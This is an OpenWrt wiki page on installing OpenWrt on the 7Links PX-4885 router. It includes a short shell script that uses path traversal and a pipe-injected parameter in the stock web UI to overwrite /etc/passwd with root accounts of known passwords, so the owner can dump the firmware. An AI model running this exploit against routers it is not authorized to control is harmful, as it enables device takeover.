User Tools

Site Tools


toh:7links:px4885

7Links PX-4885

A small battery-powered wireless router.

Hardware Highlights

SoC Ram Flash Wireless Ethernet USB Serial JTag
RaLink RT5350 32MiB 4MiB 11b/g/n 1 Gigabit 1 USB2.0 Yes (untested) ?

Product page on manufacturer's website (DE)

Downloads section (GPL source code) (DE)

NOTE: The GPL tarball provided by the manufacturer contains the Ralink SDK but not all the required software and assets to build the stock firmware image.

Installation

Flash Layout

Base address Size OpenWRT name Purpose
0x000000 0x020000 u-boot The bootloader.
0x020000 0x020000 devdata Stock firmware configuration. Unused in OpenWrt.
0x040000 0x010000 devconf Contains WiFi calibration and MAC addresses.
0x050000 0x3b0000 firmware The firmware itself.

Dumping the stock firmware

In case you want to be able to switch back to the stock firmware, you need to dump it before installing OpenWRT as the manufacturer doesn't provide a firmware image.

Obtaining a root shell

The stock firmware has a telnet daemon running. However in order to drop to a root shell, it requires authenticating as user hongxun with a default password I couldn't figure out.

Luckily, a flaw in the web UI allows us to overwrite the /etc/passwd file with one we provide and get a root shell.

Here are the steps to follow:

  1. Reset the web UI username and password to admin/admin
  2. Prepare a FAT or NTFS formatted USB stick. Avoid using a multi-card reader for that since it may cause part of the firmware to crash.
  3. Create the files set_telnet_passwd.sh and passwd according to the two frames below. Save them in the same directory. Make sure set_telnet_password.sh has executable permission.
  4. Plug the USB stick into the router's USB port and wait 5 seconds after the blue LED blinks 5 times. This is necessary for a successful exploit of the flaw.
  5. Open a shell in the directory you just created the files and run the set_telnet_passwd.sh script. It should exit with a message like: curl: (52) Empty reply from server.
  6. It it succeeded, you should be now able to telnet to the router and get a root shell using username admin and password admin.
set_telnet_passwd.sh

#!/bin/sh ROUTER_IP=${1:-192.168.169.1} # Set the current directory. curl "http://admin:admin@${ROUTER_IP}/wireless/yun.asp?/media/../etc?946685196" > /dev/null # Remove the old passwd file. curl -d "n/a" "http://${ROUTER_IP}/goform/upload_file_set?action=del_files&filenames=passwd|" # And replace it with the patched one. curl -F "file=@passwd;filename=passwd" http://${ROUTER_IP}/cgi-bin/upload_file.cgi > /dev/null

passwd

hongxun:ydh7SLkuJO1zE:0:0:Adminstrator:/:/bin/sh admin:8hES/Pe0q4.Q2:0:0:Adminstrator:/:/bin/sh

Performing the actual firmware dump

Your USB media will likely be automounted as /media/sda1, so you should be able to dump a full flash image with the command:

cat /dev/mtd0ro > /media/sda1/px4885_stock_full_dump.img

The resulting file will contain a full image of the flash, with all the partitions.

If you want a firmware image directly flashable with sysupgrade or TFTP, run the command:

cat /dev/mtd6ro > /media/sda1/px4885_stock_firmware.img

IMPORTANT: Before unplugging the USB stick or switching the router off, run the umount /media/sda1 command to make sure all data was committed to disk.

Flashing using the stock firmware web UI (easiest method)

The web UI of the stock firmware can be used to flash an OpenWrt image. However it will only accept to flash an image using an initramfs root filesystem. So if you want to be able to keep your configuration across reboots, you'll need to flash your device twice:

  • Flash an initramfs OpenWrt image using the web UI of the stock firmware.
  • Now the device runs OpenWrt, perform a sysupgrade with a squashfs OpenWrt image. See generic.sysupgrade.

Flashing using TFTP

Another way to flash your device is to put the bootloader in TFTP flashing mode. To enter this mode, use a thin object (a needle for instance) to press the push button inside the small hole in the corner to the right of the ethernet port, and power on the device. If the bootloader successfully entered TFTP flashing mode, the led should be steady blue. As the button is not in the axis of the hole, it can prove difficult to hold it pressed while moving the power switch at the same time.

In TFTP flashing mode, the bootloader will send TFTP requests on its ethernet interface. It will keep trying until succeeding at downloading the firmware image.

Note: The bootloader will not check the validity of the downloaded firmware image. However, even in the case you fed it with an image that won't boot, you should still be able to restart the device in TFTP flashing mode as the bootloader partition is left untouched.

Here are the information you need to know to setup a TFTP server and your network interface.

TFTP Server (your machine) IP address 10.10.10.3
Firmware tftp image Kernal.bin
TFTP Client (device) IP Address 10.10.10.123

The Kernal.bin file fetched by the device from your TFTP server will be written directly into the firmware partition. It can be any valid Uboot image, and it obviously cannot be bigger than the size of the firmware partition (about 3.6 MiB).

The flashing process may take a couple minutes.

Once the bootloader has flashed the firmware, it will immediately attempt to boot it (the led will turn orange).

Upgrading OpenWrt

Basic configuration

Basic configuration After flashing, proceed with this.
Set up your Internet connection, configure wireless, configure USB port, etc.

Failsafe mode

Hardware

Buttons

hardware.button on howto use and configure the hardware button(s).

The PX-4885 only has one software-accessible hardware button, which is the hidden reset button. The battery button used to check the battery level is not hooked to any GPIO so it cannot be repurposed in software.

BUTTON Event
Reset reset

Serial

port.serial general information about the serial port, serial port cable, etc.

This device seems to have UART pins accessible through test pads on the board. I didn't test that thought.

JTAG

port.jtag general information about the JTAG port, JTAG cable, etc.

Debricking

generic.debrick

If you didn't erase your bootloader partition, you should still be able to boot into TFTP flashing mode and flash a new firmware image using this.

Notes

The stock firmware claims to have only 16 MiB RAM while the RAM chip is actually a 32 MiB one. OpenWrt reports the RAM size correctly and can use the full 32 MiB of RAM. What a pleasant surprise!

toh/7links/px4885.txt · Last modified: 2014/06/06 01:11 by bonstra